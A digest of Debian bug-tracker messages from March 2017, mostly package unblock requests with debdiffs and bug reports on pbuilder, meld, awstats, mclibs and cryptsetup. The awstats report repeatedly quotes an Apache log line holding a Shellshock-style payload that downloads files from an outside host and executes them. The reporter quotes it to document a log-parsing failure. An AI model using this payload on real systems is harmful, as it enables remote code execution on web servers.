> package and verifying that it works. In that case it is warranted.
> If the package is working for others but not me then it isn't.

> Could you describe and screenshot what happens when you upgrade or
> reinstall a GUI program that is running in your desktop?
> If you are willing to, please upload the screenshot here:
>
> https://screenshots.debian.net/package/needrestart-session
>
> -- 
> bye,
> pabs
>
> https://wiki.debian.org/PaulWise

-- 

::  WWW:https://fiasko-nw.net/~thomas/  ::
   :::  Jabber:   xmpp:tho...@jabber.fiasko-nw.net  :::
::  flickr: https://www.flickr.com/photos/laugufe/  ::

Bug#856848: unblock: aptitude/0.8.6-1 (pre-approval)

[Manuel A. Fernandez Montecelo]

Hi,

2017-03-05 15:15 GMT+01:00 Niels Thykier :
>
> At first glance it looks reasonable, but could you please provide a
> debdiff of the changes for a second review.

Sure.

For the upstream side of the changes I recommend the previous diff,
but this is the full-ish debdiff (without translations and so on).

debdiff --exclude '*.po' --exclude '*.pot' --exclude 'configure*'
--exclude '*.gmo' aptitude_0.8.[56]-1.dsc >
/tmp/aptitude-for-stretch.debdiff


-- 
Manuel A. Fernandez Montecelo 


aptitude-for-stretch.debdiff
Description: Binary data

Bug#841935: pbuilder: incorrect permissions on /dev/ptmx breaks openpty()

[James Clarke]

On 5 Mar 2017, at 19:53, Simon McVittie  wrote:
> 
> Control: unmerge -1
> Control: severity -1 normal
> Control: reassign -1 pbuilder
> 
> I'm decoupling this bug from debootstrap and making it non-RC because I
> suspect the best long-term solution might be to solve it in pbuilder
> *and* debootstrap, and debootstrap already has a RC bug representing
> the need for a short-term fix.
> 
> On Sun, 06 Nov 2016 at 20:41:38 +, James Clarke wrote:
>> newinstance seems to be a world of pain, as then it can’t access the TTY
>> for std{in,out,err}. I tried many months ago and couldn’t get it to work,
>> but would love to be proved wrong.
> 
> I agree with later commenters on this bug that it would be best for
> debootstrap to create /dev/ptmx as a real device node and not a symlink,
> and I have proposed a patch to do that. However, I don't think you can
> avoid newinstance on recent kernels *anyway*: see
> 
> and compare with
> .
> 
> So if you have trouble with interactive use under particular use cases,
> you're going to have that same trouble with stretch kernels anyway -
> unless you bind-mount the host's /dev/pts instead of mounting your own,
> like schroot does, which comes with its own problems (in my testing it
> didn't work inside an lxc container with the jessie kernel unless also
> bind-mounting the host's (i.e. lxc's) /dev).
> 
> Also, as Marco noted on #817236, if invoking debootstrap in a container that
> restricts device node creation (notably systemd-nspawn), /dev/ptmx
> cannot be created as a real device node, and the only options are to
> make it a symlink or to fail altogether. So it would seem like a good
> long-term plan to make pbuilder tolerate that arrangement? Unfortunately,
> this might involve setting up a pty between the user and the contained
> processes, or using "script /dev/null".
> 
> I attach a possible patch that makes kernels >= 2.6.29 consistent with 4.7+.
> By this point I've mostly lost track of whether it is a good idea or not :-(

So there's nothing inherently wrong with having /dev/ptmx symlink to
/dev/pts/ptmx. The trouble is that /dev/ptmx as a device node is typically 666,
whilst /dev/pts/ptmx defaults to 000, but if you mount it with ptmxmode=666
then everything works. However, this has to be done on the host, since /dev/pts
is currently (effectively) bind-mounted (by not being a new instance), and if
you want to have use newinstance instead to separate the two, the problem is
that the chroot can't access the controlling TTY any more, since it's only in
the host's /dev/pts. I would love to see newinstance working, but I tried it
once and couldn't get it to work, especially with "pbuilder login". Someone
more knowledgeable than me might be able to fix that, and I would welcome their
input.

Regards,
James



signature.asc
Description: Message signed with OpenPGP

Bug#856253: game-data-packager: xcom-ufo.yaml swapped (_orig) names under size_and_md5 section.

[René den Ouden]

2017-03-02 23:56 GMT+01:00 Alexandre Detiste :

> Hi,
>
> Thank you verry much for you patch.
>
> I cherry picked two of your commits &
> then cleaned-up the yaml file further using group syntax.
>
>
Glad to be of help.

I used check_equivalence.py to avoid regressions.
>
> Then I also worked on adding support for the GOG archive,
> but there's an handfull of files that can't be found or don't match.
>
> Can you have a look a the last commits & their comments ?
>
> https://anonscm.debian.org/cgit/pkg-games/game-data-
> packager.git/commit/?id=daa2962f88954cdaabacc741b39fdc683877f381
>
>
I will take a look at those comments (in the coming week). If you don't
mind I will answer them on your github repo (to keep the answers close to
the questions). Unless you prefer otherwise, in that case please let me
know.

Greets

René

P.s. I noticed you used my full name in the changelog. It's not that big of
a deal, but i'm wondering what would have been the correct way of me
letting you (or other debian devs) know that i actually prefer the
"callsign" R1dO?

Bug#856899: unblock: pdfsam/1.1.4-3

[Markus Koschany]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Please unblock package pdfsam

pdfsam was unusable due to a wrong LAF (look and feel) setting. [1]
I also took the opportunity to fix a Lintian error "depends on
obsolete package" and to use the secure canonical Vcs-address for
pdfsam's SVN repo.

Regards,

Markus

[1] https://bugs.debian.org/855324

unblock pdfsam/1.1.4-3
diff -Nru pdfsam-1.1.4/debian/changelog pdfsam-1.1.4/debian/changelog
--- pdfsam-1.1.4/debian/changelog   2012-04-22 06:58:00.0 +0200
+++ pdfsam-1.1.4/debian/changelog   2017-03-05 20:30:27.0 +0100
@@ -1,3 +1,14 @@
+pdfsam (1.1.4-3) unstable; urgency=medium
+
+  * Team upload.
+  * Add change-default-LAF-theme.patch and set the LAF setting to 0.
+Thanks to Philip Rinn for the report. (Closes: #855324)
+  * Fix Lintian error "depends on obsolete package" and depend on default-jre
+instead of openjdk-6-jre.
+  * Use secure canonical Vcs-address.
+
+ -- Markus Koschany   Sun, 05 Mar 2017 20:30:27 +0100
+
 pdfsam (1.1.4-2) unstable; urgency=low
 
   [ Miguel Landaeta ]
diff -Nru pdfsam-1.1.4/debian/control pdfsam-1.1.4/debian/control
--- pdfsam-1.1.4/debian/control 2012-04-22 06:46:32.0 +0200
+++ pdfsam-1.1.4/debian/control 2017-03-05 20:30:27.0 +0100
@@ -8,12 +8,12 @@
  liblog4j1.2-java, javahelper
 Standards-Version: 3.9.3
 Homepage: http://www.pdfsam.org
-Vcs-Svn: svn://svn.debian.org/svn/pkg-java/trunk/pdfsam
-Vcs-Browser: http://anonscm.debian.org/viewvc/pkg-java/trunk/pdfsam/
+Vcs-Svn: svn://anonscm.debian.org/pkg-java/trunk/pdfsam
+Vcs-Browser: https://anonscm.debian.org/viewvc/pkg-java/trunk/pdfsam/
 
 Package: pdfsam
 Architecture: all
-Depends: openjdk-6-jre | java2-runtime, libdom4j-java, libitext-java,
+Depends: default-jre | java2-runtime, libdom4j-java, libitext-java,
  libjaxen-java, libjgoodies-looks-java, liblog4j1.2-java, ${misc:Depends},
  java-wrappers, ${java:Depends}, libcommons-httpclient-java
 Description: PDF Split and Merge
diff -Nru pdfsam-1.1.4/debian/patches/change-default-LAF-theme.patch 
pdfsam-1.1.4/debian/patches/change-default-LAF-theme.patch
--- pdfsam-1.1.4/debian/patches/change-default-LAF-theme.patch  1970-01-01 
01:00:00.0 +0100
+++ pdfsam-1.1.4/debian/patches/change-default-LAF-theme.patch  2017-03-05 
20:30:27.0 +0100
@@ -0,0 +1,23 @@
+From: Markus Koschany 
+Date: Sun, 5 Mar 2017 20:09:33 +0100
+Subject: change default LAF theme
+
+Work around a startup crash by changing the LAF setting to 0.
+Bug-Debian: https://bugs.debian.org/855324
+---
+ template-basic-1/config.xml | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/template-basic-1/config.xml b/template-basic-1/config.xml
+index d29c12e..270c01a 100644
+--- a/template-basic-1/config.xml
 b/template-basic-1/config.xml
+@@ -9,7 +9,7 @@
+ 
+
+  
+-  5  
++  0  
+   14 
+   
+ en_GB  
diff -Nru pdfsam-1.1.4/debian/patches/series pdfsam-1.1.4/debian/patches/series
--- pdfsam-1.1.4/debian/patches/series  2012-04-22 06:46:31.0 +0200
+++ pdfsam-1.1.4/debian/patches/series  2017-03-05 20:30:27.0 +0100
@@ -1,2 +1,3 @@
 0001-prefer-debian-build.xml.patch
 0002-fix-the-startup-scripts.patch
+change-default-LAF-theme.patch

Bug#851066: Latest checksums for Flash Plugin not available at https://people.debian.org/~bartm/flashplugin-nonfree/D5C0FC14/

[Ingo]

> The problem is not a technical one, but just a simple question of
maintenance of the site "debian.people.org/~bartm/..." in order to
follow the latest version from Adobe.

Thats right, seems Bart Marten no longer receives mail directed to his
debian account. I found another email address in the *.deb package,
probably he will react on mails to it:

ba...@knars.be

Bug#856626: solr-tomcat: fails to start

[Markus Koschany]

Control: tags -1 confirmed

On Fri, 03 Mar 2017 01:05:38 +0100 Matthias Liertzer
 wrote:
> Package: solr-tomcat
> Version: 3.6.2+dfsg-9
> Severity: grave
> Justification: renders package unusable
> 
> solr doesn't start with the following error message(s) in the log
> 
> 03-Mar-2017 00:04:42.268 SEVERE [localhost-startStop-1]
> org.apache.tomcat.util.digester.Digester.startElement Begin event threw 
> exception
>  java.lang.ClassNotFoundException:
>  org.apache.naming.resources.FileDirContext

[...]

Hello,

thank you for the report. I believe this error message is caused by the
following entry in /etc/solr/solr-tomcat.xml.


  

This appears to be obsolete for Tomcat8. When I remove this line the
error is gone but there is still another error about a
java.lang.NullPointerException.

Regards,

Markus



signature.asc
Description: OpenPGP digital signature

Bug#856898: meld: copying within Meld changes time stamps

[Paul Schlüter]

Package: meld
Version: 3.16.4-1
Severity: minor

Dear Maintainer,

when I copy files or directories within Meld, the copies often get a slightly
different time stamp (difference up to 1 micro second). I wouldn't have noticed
this, if the "younger" files/dirs were sometimes not marked accordingly.

Example:
1. Start with a directory src/ that contains some files "file*", empty dirs
"empty*" and non-empty dirs "non-empty*". "ls --full-time" shows ...

src/
2017-03-05 15:33:23.243862000 +0100 empty+000ns
2017-03-05 15:33:23.243862044 +0100 empty+044ns
2017-03-05 15:30:58.417297176 +0100 empty+176ns
2017-03-05 15:10:56.020244755 +0100 empty+755ns
2017-03-05 15:39:52.319551913 +0100 empty+913ns
2017-03-05 12:56:09.036606000 +0100 file+000ns
2017-03-05 12:56:09.036606060 +0100 file+060ns
2017-03-05 15:24:37.712274516 +0100 file+516ns
2017-03-05 12:57:06.357629994 +0100 file+994ns
2017-03-05 17:01:26.648818000 +0100 non-empty+000ns
2017-03-05 17:01:26.648818000 +0100 non-empty+000ns/file
2017-03-05 17:01:26.648818167 +0100 non-empty+167ns
2017-03-05 17:01:26.648818167 +0100 non-empty+167ns/file

2. Compare src/ with an empty directory dest/; then copy src/ within Meld to
dest/. The time stamps within dest/ are shown below (with comparison to src/;
rounding is to integer micro second). Moreover "younger marks" (small stars at
the icons) are noted (Y) when present.

dest/
2017-03-05 15:33:23.243861000 +0100 empty+000ns   -1000ns  Y src
2017-03-05 15:33:23.243862000 +0100 empty+044ns   rnd down Y src
2017-03-05 15:30:58.417297000 +0100 empty+176ns   rnd down Y src
2017-03-05 15:10:56.020244000 +0100 empty+755ns   rnd down Y src
2017-03-05 15:39:52.319551000 +0100 empty+913ns   rnd down Y src
2017-03-05 12:56:09.036606000 +0100 file+000nsequal
2017-03-05 12:56:09.036606000 +0100 file+060nsrnd down
2017-03-05 15:24:37.712274000 +0100 file+516nsrnd down Y src
2017-03-05 12:57:06.35763 +0100 file+994nsrnd up
2017-03-05 17:01:26.648818000 +0100 non-empty+000ns   equal
2017-03-05 17:01:26.648818000 +0100 non-empty+000ns/file  equal
2017-03-05 17:01:26.648818000 +0100 non-empty+167ns   rnd down Y src
2017-03-05 17:01:26.648818000 +0100 non-empty+167ns/file  rnd down Y src

I don't see a simple rule.

I (and probably most other users) expected time stamp (dest) = time stanp (src)
as by copying with "cp -a …". If this is difficult to realize, it would be fine
if the "younger mark" could be suppressed for times that differ by less than,
say, 10 micro seconds.

Paul.




-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages meld depends on:
ii  dconf-gsettings-backend [gsettings-backend]  0.26.0-2+b1
ii  gir1.2-gtksource-3.0 3.22.2-1
ii  libcanberra-gtk3-module  0.30-3
ii  libgtk-3-0   3.22.8-1
ii  libgtksourceview-3.0-1   3.22.2-1
ii  patch2.7.5-1
ii  python-gi3.22.0-2
ii  python-gi-cairo  3.22.0-2
pn  python:any   

Versions of packages meld recommends:
ii  yelp  3.22.0-1

meld suggests no packages.

-- no debconf information

Bug#831585: tcpreen: please make the build reproducible

[Adrian Bunk]

On Sun, Jul 17, 2016 at 03:56:24PM +0200, Chris Lamb wrote:
>...
> +--- tcpreen-1.4.4.orig/m4/hostname.m4
>  tcpreen-1.4.4/m4/hostname.m4
> +@@ -5,7 +5,7 @@ dnl From Remi Denis-Courmont
> + AC_DEFUN([RDC_BUILD_HOSTNAME],
> + [AC_CACHE_CHECK([for build hostname],
> + rdc_cv_build_hostname,
> +-[rdc_cv_build_hostname=`hostname -f 2>/dev/null || uname -n 2>/dev/null || 
> hostname 2>/dev/null || echo "unknown"`
> ++[rdc_cv_build_hostname=`lsb_release --short --description`
> + ])
> + AC_DEFINE_UNQUOTED(PACKAGE_BUILD_HOSTNAME, "$rdc_cv_build_hostname",
> + [Define to the hostname of the host who builds the package.])
>...

$ lsb_release --short --description
Debian GNU/Linux 9.0 (stretch)
$ 

This does not at all look like a hostname, so if anything actually 
parses this as a hostname there might be trouble ahead.

Assuming nothing parses the version output, in this specific case
it looks more correct to remove the PACKAGE_BUILD_HOSTNAME usage
in src/main.cpp (the __DATE__ usage in the same line could then
also be removed).

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Bug#856896: unblock: openvanilla-modules/0.9.0a1.3+dfsg1-2.2

[Adrian Bunk]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Please unblock package openvanilla-modules

unblock openvanilla-modules/0.9.0a1.3+dfsg1-2.2


changelog |7 +++
 rules |2 +-
 2 files changed, 8 insertions(+), 1 deletion(-)

diff -Nru openvanilla-modules-0.9.0a1.3+dfsg1/debian/changelog 
openvanilla-modules-0.9.0a1.3+dfsg1/debian/changelog
--- openvanilla-modules-0.9.0a1.3+dfsg1/debian/changelog2011-07-01 
21:04:17.0 +0300
+++ openvanilla-modules-0.9.0a1.3+dfsg1/debian/changelog2017-03-05 
21:36:25.0 +0200
@@ -1,3 +1,10 @@
+openvanilla-modules (0.9.0a1.3+dfsg1-2.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use autotools_dev to fix FTBFS on arm64. (Closes: #727479)
+
+ -- Adrian Bunk   Sun, 05 Mar 2017 21:36:25 +0200
+
 openvanilla-modules (0.9.0a1.3+dfsg1-2.1) unstable; urgency=low
 
   * Non-maintainer upload.
diff -Nru openvanilla-modules-0.9.0a1.3+dfsg1/debian/rules 
openvanilla-modules-0.9.0a1.3+dfsg1/debian/rules
--- openvanilla-modules-0.9.0a1.3+dfsg1/debian/rules2010-07-10 
22:09:00.0 +0300
+++ openvanilla-modules-0.9.0a1.3+dfsg1/debian/rules2017-03-05 
21:36:25.0 +0200
@@ -12,7 +12,7 @@
 repackv=1
 
 %:
-   dh  $@ --with quilt
+   dh  $@ --with quilt,autotools_dev

 override_dh_auto_configure:
dh_auto_configure -- \

Bug#856897: unblock: makebootfat/1.4-5.1

[Adrian Bunk]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Please unblock package makebootfat

unblock makebootfat/1.4-5.1


 changelog |7 +++
 control   |2 +-
 rules |1 +
 3 files changed, 9 insertions(+), 1 deletion(-)

diff -u makebootfat-1.4/debian/rules makebootfat-1.4/debian/rules
--- makebootfat-1.4/debian/rules
+++ makebootfat-1.4/debian/rules
@@ -2,6 +2,7 @@
 
 include /usr/share/cdbs/1/rules/debhelper.mk
 include /usr/share/cdbs/1/class/autotools.mk
+include /usr/share/cdbs/1/rules/autoreconf.mk
 
 get-orig-source:
uscan --rename --upstream-version 0 || true
diff -u makebootfat-1.4/debian/control makebootfat-1.4/debian/control
--- makebootfat-1.4/debian/control
+++ makebootfat-1.4/debian/control
@@ -2,7 +2,7 @@
 Section: utils
 Priority: optional
 Maintainer: Soeren Sonnenburg 
-Build-Depends: cdbs, debhelper (>= 5)
+Build-Depends: cdbs, debhelper (>= 5), dh-autoreconf
 Standards-Version: 3.8.1
 Homepage:  http://advancemame.sourceforge.net/boot-readme.html
 Vcs-Svn: https://bollin.googlecode.com/svn/makebootfat/trunk/
diff -u makebootfat-1.4/debian/changelog makebootfat-1.4/debian/changelog
--- makebootfat-1.4/debian/changelog
+++ makebootfat-1.4/debian/changelog
@@ -1,3 +1,10 @@
+makebootfat (1.4-5.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Run dh-autoreconf to fix FTBFS on arm64. (Closes: #759446)
+
+ -- Adrian Bunk   Sun, 05 Mar 2017 21:55:12 +0200
+
 makebootfat (1.4-5) unstable; urgency=low
 
   * Fix link to freedos documentation (Closes: #616469)

Bug#856895: Speech Dispatcher cutting off the end of phrases while using Flite

[Samuel Thibault]

Package: speech-dispatcher-flite
Version: 0.8.6-3
Severity: grave
Tags: upstream patch pending

“
From: am_d...@fastmail.fm
To: debian-accessibil...@lists.debian.org

Hello,
I notice that while using Orca with Speech Dispatcher and Flite, the end
of most phrases are cut off. It usually cuts off the second half of the
last word spoken. I was just wondering if anyone has noticed this before
and knows of a fix if one exists. Thanks.
”

“
I am using stretch so speech dispatcher 0.8.6-3 and flite
(2.0.0-release-3). The orca version is (3.22.2-2. I don't have problems
with speech being cut off when using espeak-ng.
”

“
I am using Pulseaudio.
”

This seems to be due to the very odd and sloppy computation done in
flite_strip_silence.  I will upload a fixed package.

Samuel

Bug#855929: mclibs: FTBFS: Test failures

[Gilles Filippini]

Control; tags -1 + patch

On Thu, 23 Feb 2017 14:27:50 +0100 Lucas Nussbaum  wrote:
> Source: mclibs
> Version: 20061220+dfsg3-3
> Severity: serious
> Tags: stretch sid
> User: debian...@lists.debian.org
> Usertags: qa-ftbfs-20170221 qa-ftbfs
> Justification: FTBFS in stretch on amd64
> 
> Hi,
> 
> During a rebuild of all packages in stretch (in a stretch chroot, not a
> sid chroot), your package failed to build on amd64.
> 
> Relevant part (hopefully):
> > -L/<>/mclibs-20061220+dfsg3/lib -Wl,-static -leurodec -lpacklib 
> > -lkernlib -Wl,-dy -lm -lnsl -lcrypt -ldl -lgfortran
> > gfortran -g -o eudtest -O3 -D_FORTIFY_SOURCE=2 -fno-range-check 
> > -fno-automatic -fno-second-underscore -fstack-protector 
> > --param=ssp-buffer-size=4 -fno-automatic -Wl,-z,relro   
> > -L/<>/mclibs-20061220+dfsg3/src/lib  main.o steerd.o steerf.o 
> > testd.o testf.o   `cernlib eurodec packlib`  \
> >  || rm -f eudtest
> > rm -f eurodec.dat
> > ln -s /<>/mclibs-20061220+dfsg3/build/mclibs/eurodec/eurodec.dat 
> > eurodec.dat
> > cp 
> > /<>/mclibs-20061220+dfsg3/src/mclibs/eurodec/eudtest/eutitle.data 
> > eutitle.dat
> > Testing eurodec
> >   ... using eudtest
> > 
> > LOCB/LOCF: address 0x7f68e28cd740 exceeds the 32 bit address space
> > or is not in the data segments
> > This may result in program crash or incorrect results
> > Therefore we will stop here
> > 
> > Test result = 231
> > Makefile:482: recipe for target 'test' failed
> 
> The full build log is available from:
>http://aws-logs.debian.net/2017/02/21/mclibs_20061220+dfsg3-3_testing.log
> 
> A list of current common problems and possible solutions is available at
> http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
> 
> About the archive rebuild: The rebuild was done on EC2 VM instances from
> Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
> failed build was retried once to eliminate random failures.

Patch proposal attached, tested on amd64 and i386 sbuild.

Thanks,

_g.
diff -Nru mclibs-20061220+dfsg3/debian/changelog 
mclibs-20061220+dfsg3/debian/changelog
--- mclibs-20061220+dfsg3/debian/changelog  2013-08-23 19:13:53.0 
+0200
+++ mclibs-20061220+dfsg3/debian/changelog  2017-03-05 22:14:26.0 
+0100
@@ -1,3 +1,11 @@
+mclibs (20061220+dfsg3-3.1) unstable; urgency=medium
+
+  * Non-maintainer upload
+  * patch 213-fix-test-suite-build.dpatch modified to build eudtest
+with -no-pie (closes: #855929)
+
+ -- Gilles Filippini   Sun, 05 Mar 2017 22:14:26 +0100
+
 mclibs (20061220+dfsg3-3) unstable; urgency=low
 
   * debian/control:
diff -Nru mclibs-20061220+dfsg3/debian/patches/213-fix-test-suite-build.dpatch 
mclibs-20061220+dfsg3/debian/patches/213-fix-test-suite-build.dpatch
--- mclibs-20061220+dfsg3/debian/patches/213-fix-test-suite-build.dpatch
2013-08-23 19:13:53.0 +0200
+++ mclibs-20061220+dfsg3/debian/patches/213-fix-test-suite-build.dpatch
2017-03-05 22:13:53.0 +0100
@@ -20,9 +20,11 @@
 diff -urNad mclibs-2006.dfsg.2~/src/mclibs/eurodec/eudtest/Imakefile 
mclibs-2006.dfsg.2/src/mclibs/eurodec/eudtest/Imakefile
 --- mclibs-2006.dfsg.2~/src/mclibs/eurodec/eudtest/Imakefile   1997-03-14 
17:32:14.0 +
 +++ mclibs-2006.dfsg.2/src/mclibs/eurodec/eudtest/Imakefile2008-01-04 
18:57:55.0 +
-@@ -4,11 +4,10 @@
- 
+@@ -3,12 +3,12 @@
+ DefinePackageLibrary(NullParameter)
+  
  FORTRANSAVEOPTION = FortranSaveFlags
++FORTRANOPTIONS += -no-pie
  
 
-CernlibFortranProgramTarget(eudtest,$(OBJS),$(PACKAGE_LIB),$(PACKAGE_LIB),packlib)
 
+CernlibFortranProgramTarget(eudtest,$(OBJS),NullParameter,NullParameter,eurodec
 packlib)


signature.asc
Description: OpenPGP digital signature

Bug#856894: unblock: libmthca/1.0.6-1.1

[Adrian Bunk]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Please unblock package libmthca

unblock libmthca/1.0.6-1.1

 changelog |8 
 control   |3 +--
 rules |2 +-
 3 files changed, 10 insertions(+), 3 deletions(-)

diff -Nru libmthca-1.0.6/debian/changelog libmthca-1.0.6/debian/changelog
--- libmthca-1.0.6/debian/changelog 2011-07-06 23:13:54.0 +0300
+++ libmthca-1.0.6/debian/changelog 2017-03-05 21:22:15.0 +0200
@@ -1,3 +1,11 @@
+libmthca (1.0.6-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use autotools_dev to fix FTBFS on arm64. (Closes: #727417)
+  * Remove the obsolete DM-Upload-Allowed field.
+
+ -- Adrian Bunk   Sun, 05 Mar 2017 21:22:15 +0200
+
 libmthca (1.0.6-1) unstable; urgency=low
 
   * New upstream release.
diff -Nru libmthca-1.0.6/debian/control libmthca-1.0.6/debian/control
--- libmthca-1.0.6/debian/control   2011-07-06 23:13:54.0 +0300
+++ libmthca-1.0.6/debian/control   2017-03-05 21:22:10.0 +0200
@@ -1,8 +1,7 @@
 Source: libmthca
 Priority: extra
 Maintainer: Roland Dreier 
-DM-Upload-Allowed: yes
-Build-Depends: debhelper (>= 7.0.50~), dpkg-dev (>= 1.13.19), libibverbs-dev 
(>= 1.1)
+Build-Depends: debhelper (>= 7.0.50~), dpkg-dev (>= 1.13.19), libibverbs-dev 
(>= 1.1), autotools-dev
 Standards-Version: 3.9.2
 Section: libs
 Homepage: http://www.openfabrics.org/
diff -Nru libmthca-1.0.6/debian/rules libmthca-1.0.6/debian/rules
--- libmthca-1.0.6/debian/rules 2011-07-06 23:13:54.0 +0300
+++ libmthca-1.0.6/debian/rules 2017-03-05 21:22:15.0 +0200
@@ -2,7 +2,7 @@
 # -*- mode: makefile; coding: utf-8 -*-
 
 %:
-   dh $@
+   dh $@ --with autotools_dev
 
 override_dh_strip:
dh_strip --dbg-package=libmthca1-dbg

Bug#856893: awstats: gets distracted by (probably) quotes in Referrer in Apache log

[Dominik George]

Package: awstats
Version: 7.2+dfsg-1
Severity: normal

AWstats in jessie gets distracted by the following line in an Apache log:

staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\;;''$b = \"http://x5d.su/s/susu2\;;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"

The issue, obviously, is the Referrer, which someone tried to leverage
to exploit the webserver, or PHP.

Unfortunately, the line breaks awstats, and is effectively a DoS against
AWstats.

While breaking AWstats will, in practice, probably cause no real harm,
it's still broken by valid input (the above posted line *is* valid
input…), so I am reporting this as critical.

I think the cause of the issue is AWstats not expecting escaped quotes
in the string and mistaking them for ending quotes of the Referrer.

Here's awstats' output hitting this line:

Error while processing /etc/awstats/awstats.www.teckids.org.conf
Create/Update database for config "/etc/awstats/awstats.www.teckids.org.conf" 
by AWStats version 7.2 (build 1.992)
>From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7548)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/admin.html HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a 
= \"http://x5d.su/s/susu1\;;''$b = \"http://x5d.su/s/susu2\;;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.www.teckids.org.conf' file, web server or 
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
Error while processing /etc/awstats/awstats.conf
Create/Update database for config "/etc/awstats/awstats.conf" by AWStats 
version 7.2 (build 1.992)
>From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7554)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\;;''$b = \"http://x5d.su/s/susu2\;;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.conf' file, web server or permissions) may be 
wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).

-- 

Bug#856892: cryptsetup: Please provide third backup LUKS header at the end of the device too.

[Witold Baryluk]

Package: cryptsetup
Version: 2:1.7.3-3
Severity: normal


It is a serious problem.

It is quiet easy to overwrite LUKS headers at the start of the device.

Especially if you create a LUKS on a whole device without partition
table, and then dual-booted Windows decides to create a new empty
partition table for you because there is not yet one. And now all your
data are gone (if you do not have LUKS headers backups).

Adding third backup block (first two being at the start and a bit after
start of a device), at the end of the device (or even two times at the
end), would be really useful!


-- System Information:
Debian Release: 9.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.10.0-wc1 (SMP w/12 CPU cores; PREEMPT)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages cryptsetup depends on:
ii  cryptsetup-bin 2:1.7.3-3
ii  debconf [debconf-2.0]  1.5.60
ii  dmsetup2:1.02.137-1
